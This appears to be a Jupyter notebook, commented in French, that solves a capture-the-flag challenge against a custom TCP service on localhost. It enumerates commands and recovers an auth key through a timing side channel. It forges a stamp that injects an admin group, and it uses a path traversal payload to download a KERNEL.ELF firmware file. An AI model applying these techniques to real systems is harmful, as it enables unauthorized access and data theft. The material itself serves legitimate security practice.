In [1]:
import time
import socket
import random
from itertools import product
from tqdm import tqdm
import struct

In [2]:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
    
PORT = 1337
host_ip = "localhost"

s.connect((host_ip, PORT)) 


In [3]:
def send_msg(msg):
    s.send(msg)
    res = s.recv(6)
    while len(res) < 6:
        res += s.recv(6 - len(res))
    length = struct.unpack(">I", res[2:6])[0]
    print(f'Packet length: {length}')
    while len(res) < length:
        res += s.recv(length - len(res))
    return res

In [4]:
# Recherche des commandes

# for i in range(256):
#     res = send_msg(i.to_bytes(1, 'little'))
#     if not b"Unknown CMD" in res:
#         print (i, res)
#     time.sleep(0.5)

In [44]:
# message 0x01 (taille 5)

msg = b'\x01yooo'
print(send_msg(msg))

b'\x01\x01\x00\x00\x00\nyooo'


In [13]:
# message 0x25 (taille 9)
charset = b'0123456789abcdef'
key = b"\x250338d348"
for x in charset:
    times = []
    for _ in range(10):
        msg = key + x.to_bytes(1, 'little')
        msg += 3 * b'0'
        # print(msg)
        start_time = time.time()
        send_msg(msg)
        end_time = time.time()
        times.append(end_time - start_time)
    print(x.to_bytes(1, 'little'), sum(times) / len(times))
    # time.sleep(0.5)
#key = '0338d348'

b'0' 0.8943923473358154
b'1' 0.8917071580886841
b'2' 0.8638022303581238
b'3' 0.8918377161026001
b'4' 0.8917266249656677
b'5' 0.8918078184127808
b'6' 0.8919435977935791
b'7' 0.8918144702911377
b'8' 0.8918214201927185
b'9' 0.8919414401054382
b'a' 0.8918220281600953
b'b' 0.8638981699943542
b'c' 0.8918864488601684
b'd' 1.107860553264618
b'e' 0.8918134212493897
b'f' 0.8918912053108216


In [5]:
# Unlock CMDs

key = b"\x250338d348"
print(send_msg(key))

Packet length: 28
b'\x01%\x00\x00\x00\x1cAUTH OK, CMDs UNLOCKED'


In [6]:
# message 0xac (taille 129)
offset_i = b'\x00\x00\x00\x10'
offset_k = b'\x00\x00\x00\x0c'
offset_o = b'\x00\x00\x00\x51'
header = offset_i + offset_k + offset_o
key = b'D37AE50F'
content = b'group=user\ngroup=admin\nepoch=5700000'
stamp = header + key + content
msg = b'\xac' + stamp.ljust(128, b'\x00')

print(msg)
print(send_msg(msg))


b'\xac\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x00\x00QD37AE50Fgroup=user\ngroup=admin\nepoch=5700000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
Packet length: 286
b'\x01\xac\x00\x00\x01\x1eSecret Stamp :: \x0c\xf8\xb5\xc2\xdc1\xba\x10x\xaa\x17\xcb\xa7q\x97\x15\xd9|\x00\x9a~9\x7fcXE\xee;\x80K\xe2H4\xed\xca\x84!WH\x86\xb0\x04B\x7f+\xcfB\'\x93\x08WX\xc7\xb4\xcd;\xf3 \xba\'\x12\xdd\xfa\xec\xa2\x93\x1d\x859o-Ss\x9b\xa1\xcfDm\xa8\xeb}Sc\x8a\x8c\xe4"Dj\xf3\x1e\xd9\xe0\xc5\x89`h\xdc\xf1\xde\xd0\xed \x86|\xe0\xc2w\x14\xc5\xfa\x85\xbc W\x01\x9c~\x04\x11G.\xfc\xd9\xb9\xb69%\x81\x92\xe3\x9c\x87\xc5\x0b\xb7\xdb\xff\xbc\xbf\x03\x0eF\x0b\xfa\x8f&\x93\xcf\xe2\xadju\xd0\xfbZ\xcci\xc0\xb8L\x1c[]5c\x89u\x05K\xf7\xe2\xb1I\x13\x9e\x9aDk\x96\x9d\xa9>;\x0c\xb5\x0f\t\x97

In [18]:
#packet length of 0x40 (taille 6)


msg = b'\x40' + b'\x00\x00\x00\x00\x00'
print(send_msg(msg))

b'\x00@\x00\x00\x00%\x02ACCESS DENIED, WRONG CHALLENGE'


In [42]:
msg = b'\x2a' + b'ls FW'
print(send_msg(msg))

Packet length: 17
b'\x01*\x00\x00\x00\x11KERNEL.ELF '


In [48]:
#Grab elf file

msg = b'\x2a' + b'logdl ./././././././././././././././././././././././././././././././././././././././././././././././././././././../FW/KERNEL.ELF'
elf_file = send_msg(msg)[6:] #On enlève le header

f = open("KERNEL.ELF", "wb")
f.write(elf_file)
f.close()

# print(elf_file)

Packet length: 992946


In [40]:
#change disk
msg = b'\x40\x14\x53\x7a\x40\x01'
print(send_msg(msg))

Packet length: 31
b'\x00@\x00\x00\x00\x1f\x06UNABLE TO CHANGE DISK ID'
